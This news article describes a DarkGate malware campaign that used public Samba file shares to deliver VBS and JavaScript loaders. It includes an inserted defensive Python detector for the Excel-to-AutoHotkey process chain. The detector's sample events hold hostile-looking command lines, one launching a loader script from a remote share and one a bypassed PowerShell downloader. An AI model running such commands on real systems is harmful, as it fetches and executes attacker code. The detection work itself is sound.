Global Security

The DarkGate malware exploits Samba file shares in a short-lived campaign

By Admin, July 13, 2024

July 12, 2024 | Newsroom | Malware / Cyber Attacks

Cybersecurity researchers have shed light on a short-lived DarkGate malware campaign that used Samba file shares to initiate the infection.

Palo Alto Networks Unit 42 said the activity spanned March and April 2024, with the infection chains using servers running public Samba file shares that hosted Visual Basic Script (VBS) and JavaScript files. The targets were located in North America, Europe and parts of Asia.

“This was a relatively short campaign that shows how threat actors can creatively abuse legitimate tools and services to spread their malware,” security researchers Vishwa Thothathri, Yijie Sui, Anmol Maurya, Uday Pratap Singh and Brad Duncan said.


DarkGate, which first appeared in 2018, has since developed into a malware-as-a-service (MaaS) offering used by a tightly controlled number of customers. It comes with capabilities to remotely control compromised hosts, execute code, mine cryptocurrency, launch reverse shells, and drop additional payloads.

Attacks involving the malware have become particularly common in recent months following the takedown of the QakBot infrastructure by multinational law enforcement agencies in August 2023.

The campaign, documented by Unit 42, begins with Microsoft Excel (.xlsx) files that, when opened, prompt targets to click an embedded “Open” button, which in turn retrieves and runs VBS code located on a Samba share.

The VBS script is configured to retrieve and execute a PowerShell script, which is then used to download the AutoHotKey-based DarkGate package.

Alternative sequences using JavaScript files instead of VBS are no different in that they are also designed to download and run the follow-on PowerShell script.
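The infection chain above (Office document, script host loading a .vbs or .js from a Samba/UNC share, PowerShell, AutoHotkey) is the kind of parent/child process lineage an endpoint detection can key on. The following detector is an added example, not code from the article or from Unit 42; it runs over constructed Sysmon-style process-creation events whose field names (pid, ppid, image, cmdline) are assumptions.

```python
import re

# Stage predicates for the chain: Office -> wscript/cscript running a
# .vbs/.js from a UNC (Samba) share -> PowerShell -> AutoHotkey.
UNC_SCRIPT = re.compile(r'\\\\[^\\\s]+\\\S+\.(?:vbs|js)\b', re.IGNORECASE)

def _image_is(ev, *names):
    return ev["image"].lower().endswith(names)

STAGES = [
    lambda ev: _image_is(ev, "excel.exe", "winword.exe"),
    lambda ev: _image_is(ev, "wscript.exe", "cscript.exe")
               and UNC_SCRIPT.search(ev["cmdline"]) is not None,
    lambda ev: _image_is(ev, "powershell.exe", "pwsh.exe"),
    lambda ev: "autohotkey" in ev["image"].lower(),
]

def find_darkgate_chains(events):
    """Return one [office, script, powershell, ahk] pid list per full chain.
    Walks parents from each AutoHotkey process; any missing stage means no alert."""
    by_pid = {ev["pid"]: ev for ev in events}
    chains = []
    for ev in events:
        if not STAGES[-1](ev):
            continue
        path, cur, stage = [ev["pid"]], ev, len(STAGES) - 2
        while stage >= 0:
            cur = by_pid.get(cur["ppid"])
            if cur is None or not STAGES[stage](cur):
                break
            path.append(cur["pid"])
            stage -= 1
        if stage < 0:
            chains.append(path[::-1])
    return chains

# Constructed sample events (not real telemetry); 203.0.113.10 is a documentation address.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": r'EXCEL.EXE "C:\Users\u\Downloads\invoice.xlsx"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe \\203.0.113.10\share\loader.vbs"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -ep bypass -c <downloader>"},
    {"pid": 500, "ppid": 400, "image": r"C:\Users\u\AppData\Roaming\AutoHotkey.exe",
     "cmdline": "AutoHotkey.exe script.ahk"},
    # Benign control: a local .vbs launched from Explorer, with no Office parent.
    {"pid": 600, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\tools\cleanup.vbs"},
]
```

Calling `find_darkgate_chains(SAMPLE_EVENTS)` returns `[[200, 300, 400, 500]]`; the local-script control event produces no chain.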


DarkGate works by scanning for various anti-malware programs and checking CPU information to determine whether it is running on a physical host or in a virtual environment, which helps it evade analysis. It also checks running host processes for the presence of reverse engineering tools, debuggers, or virtualization software.

“DarkGate C2 traffic uses unencrypted HTTP requests, but the data is obfuscated and appears as Base64-encoded text,” the researchers said.

“As DarkGate continues to evolve and refine its methods of penetration and resistance to analysis, it remains a powerful reminder of the need for robust and proactive cybersecurity protections.”
